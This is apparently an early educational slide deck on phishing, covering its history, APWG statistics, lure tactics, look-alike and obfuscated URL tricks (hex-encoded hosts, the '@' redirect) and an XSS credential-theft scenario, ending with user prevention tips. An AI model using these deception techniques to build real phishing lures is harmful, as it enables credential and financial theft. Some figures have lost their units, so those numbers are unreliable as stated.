Phishing

1
Phishing

• Prepared Presented by
• Hendra Harianto Tuty

2
What is Phishing!?

• In computing, phishing is a form of social
  engineering, characterized by attempts to
  fraudulently acquire sensitive information, such
  as passwords and credit card details, by
  masquerading as a trustworthy person or business
  in an apparently official electronic
  communication, such as an email or an instant
  message.
• Phishers are phishing artists
• Wikipedia, the free encyclopedia

3
History of Phishing

• Phreaking Fishing Phishing
• - Phreaking making phone calls for free back in
  70s
• - Fishing Use bait to lure the target
• Phishing in 1995
• Target AOL users
• Purpose getting account passwords for free time
• Threat level low
• Techniques Similar names ( www.ao1.com for
  www.aol.com ), social engineering
• Phishing in 2001
• Target Ebayers and major banks
• Purpose getting credit card numbers, accounts
• Threat level medium
• Techniques Same in 1995, keylogger

4
History of Phishing (Cont.)

• Phishing in 2005
• Target Paypal, banks, ebay
• Purpose bank accounts
• Threat level high
• Techniques browser vulnerabilities, link
  obfuscation

5
How it works!?

• Create phishing server
• Involve social engineering in scam emails
• - Use spoofed identity of trusted organization
  to gain trust
• - Urge victims to update or validate their
  account
• - Threaten to terminate the account if the
  victims not reply
• - Use gift or bonus as a bait
• - Security promises
• Lure victims to a bogus site
• - Obfuscation URL
• - Disguised website interface
• Make the layout of the bogus website looks the
  same as the
  original website
• - Collect the username and password when victims
  try to login

6
Examples
7
More Examples
8
Facts

• Phishing is a new trend of stealing information
• Phishing attacks get more and more sophisticated
• Average monthly growth rate is 50
• Citibank, ebay, and AOL were favorite target
• Country hosting the most phishing websites USA
  (35)
• Source July Report, APWG

9
Facts (Cont.)

• Data from Anti-Phishing Working Group

10
Facts (Cont.)

• Estimated number of people who received phishing
  emails in 2004 57 milliions
• Those opened the emails 19
• Those gave the information 3-5
• At Earthlink, the cost per attack 40,000
• July 2005 Report, APWG

11
Type of Phishing Attacks

• Impersonate (Simple Attack)
• Direct Attack
• Image Link
• Fake site looks like original site
• Man-in-the-middle
• Using link to direct the victims to hostile site
• Pop-Up (Creative Attack)
• Not man-in-the-middle
• Direct victims to real site, but pop up the
  hostile page

12
Techniques

• Similar URL
• URL Obfuscation
• XSS (Cross-Site Scripting)

13
Similar URL

• Cousin URL such as www.aol.com for www.aoI.com or
  www.a0l.com
• Bad URL
• Legitimate website http//www.mybank.com
• Bogus website http//www.mybank.privatebankin
  g.com
• http//www.mybank.com.ch
• http//www.mybank.secureaccess.com

14
URL Obfuscation

• First of all, there are many representation of
  URL
• Normal address http//www.google.com
• Dotted address http//64.233.167.99
• Dot-less address http//1089054568
• Escape Encoding http//7777772E676F6F67
  6C652E636F6D
• All of those address lead to google website

15
URL Obfuscation (Cont.)

• Use of _at_
• Common application ftp//usernamepassword_at_ftp.c
  se.ohio-state.edu
• Bogus application
• http//www.bank.com_at_www.bad.com
• Use of escape encoding
• http//www.good.com_at_7777772E6261642E636
  F6D
• What does it mean !!!??
• ? http//www.good.com_at_www.bad.com

16
XSS (Cross-Site Scripting)

• XSS vulnerability is caused by the failure of a
  site to validate user input before returning it
  to the clients web-browser (Quoted from
  http//www.cert.org)
• Phishing Scenario
• Victim logs into a web site
• Attacker has spread mines using an XSS
  vulnerability
• Victim stumbles upon an XSS mine
• Victim gets a message saying that their session
  has expired, and they need to authenticate again
• Victims username and password are sent to
  attacker

17
Defenses

• Education
• Prevention

18
Prevention

• Never respond to an email asking for personal
  information
• Always check the site to see if it is secure.
  Call the phone number if necessary
• Never click on the link on the email. Retype the
  address in a new window
• Keep your browser updated
• Keep antivirus updated
• Use firewall

19
References

• Wikipedia, free encylopedia. http//www.wikipedia.
  org
• Anti-Phishing Working Group. http//www.antiphishi
  ng.org
• Zeltser, Lenny. Trends in Impersonation Attacks
  Technologies and Motivation http//www.zeltser.co
  m/presentations/impersonation-attacks.pdf
• Drake, Christine E. Oliver, Jonathan J. Koontz,
  Eugene J. Anatomy of a Phishing Email
  http//www.ceas.cc/papers-2004/114.pdf